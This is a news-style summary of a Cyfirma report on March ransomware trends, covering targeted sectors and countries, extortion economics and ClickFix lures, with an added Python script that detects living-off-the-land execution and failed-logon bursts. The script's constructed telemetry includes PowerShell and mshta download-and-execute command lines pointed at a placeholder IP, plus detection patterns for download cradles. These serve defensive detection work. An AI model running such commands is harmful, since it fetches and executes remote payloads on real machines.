New data from Cyfirma shows that ransomware activity in March continued the sector's shift toward structured, repeatable extortion models, in which encryption is paired with data theft to maximize pressure on victims. According to the findings, growing fragmentation among extortion groups suggests that smaller or emerging actors could adopt automation, AI-assisted reconnaissance, and data-driven victim profiling to scale operations efficiently. These campaigns rely heavily on coercive messaging that warns against third-party recovery attempts and stresses the risk of permanent data loss, underscoring that psychological pressure remains central to converting victims into payers.
At the operational level, ransomware actors in March continued to refine rather than reinvent their tactics, prioritizing efficiency, scalability, and consistency across attacks. Cyfirma assesses that groups are likely to increase encryption speed, standardize extortion workflows, and expand double-extortion practices, while continuing to rely on common intrusion vectors such as phishing and exposed services. The broader trajectory points to incremental evolution within a mature ecosystem, where innovation is less about novel techniques and more about optimizing execution and monetization across a globally opportunistic threat landscape.
Cyfirma noted that ransomware targeting continues to focus on high-value economies, particularly the U.S., and on critical sectors like manufacturing, healthcare, and IT, where disruption and sensitive data can be monetized effectively. Attackers are refining their methods through rapid vulnerability exploitation, credential abuse, living-off-the-land techniques, and low-detection execution, enabling faster and more covert intrusions.
At the same time, ransomware economics are shifting, with fewer victims paying but higher ransom demands, indicating a move toward selective high-value extortion alongside large-scale attacks. The increasing overlap with state-linked activity and the use of scalable infrastructure further highlight ransomware’s evolution into a resilient, modular, and globally distributed cybercrime ecosystem.
In March, ransomware activity remained heavily concentrated in sectors that combine operational dependency with high-value data exposure. Professional goods and services emerged as the most targeted sector with 245 incidents, reflecting attackers’ focus on organizations handling sensitive client and business-critical data. Manufacturing followed with 176 incidents, and consumer goods and services recorded 118, highlighting sustained pressure on production-driven and customer-facing industries where disruption directly affects revenue.
Significant targeting was also observed in healthcare with 106 incidents and information technology with 95, underscoring risks to critical services and the central role of IT providers within supply chains. Additional activity was spread across real estate and construction with 80 incidents, government and civic sectors with 72, and materials with 67, pointing to continued exposure in infrastructure and public-facing domains.
Mid-tier activity included finance with 39 incidents, education with 37, telecommunications and media with 36, and transportation and logistics with 34. Lower volumes were recorded in energy and utilities with 26 incidents, and automotive with 21, alongside 42 unidentified or obfuscated cases, reinforcing a consistent targeting strategy focused on sectors where disruption and data compromise can be most effectively monetized.
The Cyfirma report disclosed that ransomware operations are shifting toward custom-built and AI-assisted tooling, reducing reliance on publicly available builders and enabling low-detection, per-target payload generation. Attackers are increasingly exploiting internet-facing vulnerabilities and zero-day flaws, particularly in enterprise software and edge infrastructure, to gain rapid and often unauthenticated initial access.
Intrusion models are becoming more modular and multi-stage, with initial access, persistence, reconnaissance, and ransomware deployment decoupled and executed selectively. At the same time, there is a growing reliance on credential-based access and identity compromise, including brute-force attacks and insider involvement, which reduces dependence on traditional phishing techniques.
Ransomware campaigns are also adopting user-assisted execution and social engineering methods such as ClickFix, in which a fake error or verification prompt instructs the victim to copy a command and paste it into the Run dialog or a terminal. Because the user launches the payload themselves, the execution chain looks like ordinary interactive activity rather than an exploit or a malicious attachment, which is how these lures slip past controls built around those vectors. In parallel, threat actors are increasingly using fileless and low-noise execution techniques, relying on legitimate tools and in-memory payloads to evade endpoint detection.
The ransomware ecosystem continues to function as a distributed and collaborative model, involving initial access brokers, affiliates, and specialized operators across different stages of the attack lifecycle. Extortion strategies are evolving into multi-layered approaches that combine encryption, data theft, operational disruption, and adaptive monetization tailored to the specific context of each victim.
Cyfirma reported that ransomware activity in March remained sharply concentrated in the U.S., which recorded 1,245 victims and retained a clear lead as the primary global target. A second tier of activity centered on the United Kingdom with 115 incidents and Canada with 109, followed by Germany with 80, France with 78, and Italy with 68, underscoring a continued and deliberate focus on mature, high-value economies.
Beyond these core targets, activity extended into both developed and emerging markets, with Brazil reporting 51 incidents, India 44, Spain 42, Thailand 41, and Australia 36. Mid-level volumes were observed in Switzerland and Turkey with 27 each, Mexico with 24, Taiwan with 23, Singapore and the UAE with 21 each, South Korea with 20, and Argentina with 19, pointing to consistent targeting of globally connected economies and regional hubs.
Most other countries registered low double-digit or single-digit incidents, reflecting a long-tail pattern of opportunistic attacks. Taken together, the distribution underscores a familiar dynamic, with ransomware activity heavily concentrated in a handful of high-value geographies while remaining broadly dispersed across the global threat landscape.
Cyfirma observed that ransomware activity in March reflected a clear shift from opportunistic attacks toward a more structured and economically optimized model. The ecosystem is becoming increasingly fragmented, with a growing number of active extortion groups operating alongside a broader network of initial access brokers and specialized operators.
At the same time, attackers are moving away from reliance on high payment rates, instead scaling attack volume while extracting larger ransom amounts from a smaller pool of high-value victims. This signals a more calculated approach to value extraction, where targeting is selective, data-driven, and focused on organizations with the greatest ability to pay or the most to lose.
Operationally, ransomware actors are accelerating intrusion timelines by rapidly exploiting newly disclosed vulnerabilities in enterprise software, particularly remote access and communication platforms, to gain immediate privileged access. This is paired with a steady rise in credential-based attacks, living-off-the-land techniques, and the abuse of legitimate administrative tools, allowing attackers to blend into normal network activity and evade detection.
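Two of the behaviours described above, ClickFix-style user-assisted execution combined with fileless use of legitimate Windows tools, and the burst of failed logons that precedes credential-based access, lend themselves to simple host-telemetry heuristics. The following is an added example written for this page, not Cyfirma's code or any vendor's detection logic. It assumes process-creation and logon events have already been normalised into Python dicts with Sysmon- and Windows 4625-like field names (`image`, `parent_image`, `command_line`, `src_ip`, `user`, `status`, `ts`); the telemetry, the IP addresses (documentation ranges) and the thresholds are constructed for illustration.

```python
"""Detection heuristics for ClickFix-style / living-off-the-land execution
and for credential brute force. Added example, not Cyfirma's code. Field
names are assumed to be Sysmon Event ID 1 and Windows 4625-style records
normalised to dicts; all telemetry below is constructed."""
import re
from collections import defaultdict

# Parents that mean a human launched the child from the desktop shell or a
# browser: the ClickFix shape, where the victim pastes the command themselves.
USER_SHELL_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
# Signed Windows binaries routinely abused for fileless staging.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
# Command-line indicators; every pattern that fires contributes one reason.
INDICATORS = [
    (re.compile(r"-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "in-memory execution"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|-urlcache", re.I),
     "download cradle"),
    (re.compile(r"https?://", re.I), "remote URL"),
    (re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|bypass", re.I), "hidden/bypass flags"),
]


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def analyse_process_event(ev):
    """Classify one process-creation event as 'alert', 'suspicious' or 'benign'.
    A LOLBin started from a user shell with any indicator is an alert (ClickFix
    shape). A LOLBin with three or more indicators is an alert regardless of
    parent (service- or task-driven fileless staging). A LOLBin with fewer
    indicators is only suspicious: legitimate admin scripts use flags such as
    -ExecutionPolicy Bypass too, so this tier needs allow-listing, not blocking."""
    image, parent = _basename(ev["image"]), _basename(ev["parent_image"])
    if image not in LOLBINS:
        return {"verdict": "benign", "reasons": []}
    indicators = [why for rx, why in INDICATORS if rx.search(ev.get("command_line", ""))]
    user_assisted = parent in USER_SHELL_PARENTS
    if not indicators:
        verdict = "benign"
    elif user_assisted or len(indicators) >= 3:
        verdict = "alert"
    else:
        verdict = "suspicious"
    reasons = indicators + ([f"started from {parent}"] if user_assisted else [])
    return {"verdict": verdict, "reasons": reasons}


def failed_logon_bursts(logons, threshold=8, window_s=300):
    """Flag sources with >= threshold failed logons inside any window_s span and
    record whether a success from the same source followed the burst (a spray
    or brute force that landed, i.e. credential-based access in progress)."""
    by_src = defaultdict(list)
    for e in logons:
        by_src[e["src_ip"]].append(e)
    findings = {}
    for src, evs in by_src.items():
        fails = sorted((e for e in evs if e["status"] == "failure"), key=lambda e: e["ts"])
        start, peak = 0, 0
        for end in range(len(fails)):          # sliding window over failures
            while fails[end]["ts"] - fails[start]["ts"] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            last_fail = fails[-1]["ts"]
            findings[src] = {
                "peak_failures_in_window": peak,
                "distinct_users": len({e["user"] for e in fails}),
                "success_after_burst": any(e["status"] == "success" and e["ts"] >= last_fail for e in evs),
            }
    return findings


BASE = 1_700_000_000  # constructed epoch timestamp
PROCESS_EVENTS = [    # constructed telemetry
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -nop -c "iex (iwr http://203.0.113.10/x)"'},           # ClickFix paste
    {"image": r"C:\Windows\System32\mshta.exe", "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": "mshta http://203.0.113.10/verify.hta"},                                      # fake-CAPTCHA lure
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell -ExecutionPolicy Bypass -File C:\scripts\nightly_backup.ps1"},  # legitimate task
    {"image": r"C:\Windows\System32\notepad.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe readme.txt"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABO"},   # encoded paste
]
LOGON_EVENTS = (      # constructed: a 10-account spray that lands, and one user mistyping a password
    [{"ts": BASE + 10 * k, "src_ip": "198.51.100.7", "user": f"user{k:02d}", "status": "failure"} for k in range(10)]
    + [{"ts": BASE + 100, "src_ip": "198.51.100.7", "user": "svc_backup", "status": "success"}]
    + [{"ts": BASE + 5, "src_ip": "192.0.2.5", "user": "alice", "status": "failure"},
       {"ts": BASE + 400, "src_ip": "192.0.2.5", "user": "alice", "status": "failure"},
       {"ts": BASE + 410, "src_ip": "192.0.2.5", "user": "alice", "status": "success"}]
)


def run_detections():
    """Run both detectors over the constructed telemetry and return the results."""
    verdicts = [analyse_process_event(ev)["verdict"] for ev in PROCESS_EVENTS]
    return verdicts, failed_logon_bursts(LOGON_EVENTS)


if __name__ == "__main__":
    verdicts, bursts = run_detections()
    for ev, verdict in zip(PROCESS_EVENTS, verdicts):
        print(f"{verdict.upper():10} {ev['command_line']}  {analyse_process_event(ev)['reasons']}")
    print(bursts)
```

The scheduled backup script lands in the "suspicious" tier rather than "alert" on purpose: it shares a flag with malicious invocations but has a service parent and no download or in-memory indicator, which is exactly the grey zone the report describes when it says attackers blend into normal administrative activity. In practice that tier is narrowed by allow-listing signed script paths or known task parents rather than by loosening the alert rules.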
The use of scalable infrastructure, including virtualized environments and cloud-hosted systems, further enables efficient payload distribution and resilience against takedowns. Taken together, these developments point to a ransomware landscape that is faster, more modular, and increasingly difficult to disrupt, with attackers prioritizing stealth, speed, and precision over brute-force execution.
In conclusion, Cyfirma observes that ransomware entering 2026 has evolved beyond isolated cyber incidents into a persistent, multi-stage business threat that blends cybercrime, espionage tradecraft, and economic coercion. The separation of access, execution, and extortion, along with the abuse of trusted environments and long-lived access infrastructure, is steadily weakening traditional exploit-focused and signature-based defenses.
This comes as the growing scale and complexity of affiliate-driven operations introduce points of fragility that can be targeted beyond the endpoint, particularly across access brokers, backend infrastructure, and coordination layers. For organizations, resilience now hinges less on preventing every intrusion and more on governance readiness, third-party risk oversight, visibility into user interactions, and executive-level response planning. As ransomware groups lean further into stealth, flexibility, and psychological pressure, proactive threat monitoring and coordinated response strategies will be essential to limit both operational disruption and long-term business risk.
Recent reporting shows ransomware increasingly overlapping with state-linked activity and faster, vulnerability-driven attacks. Iranian-affiliated actors are using ransomware proxies and cybercriminal networks to target U.S. critical infrastructure, blending geopolitical objectives with financially motivated operations and leveraging existing criminal ecosystems for scale and deniability.
At the same time, groups such as Storm-1175 are accelerating attacks by exploiting web-facing systems and newly disclosed vulnerabilities, particularly in healthcare and professional services across the U.S., the U.K., and Australia. These campaigns compress intrusion timelines and prioritize rapid access, data theft, and ransomware deployment, reflecting a broader shift toward speed, efficiency, and immediate operational impact.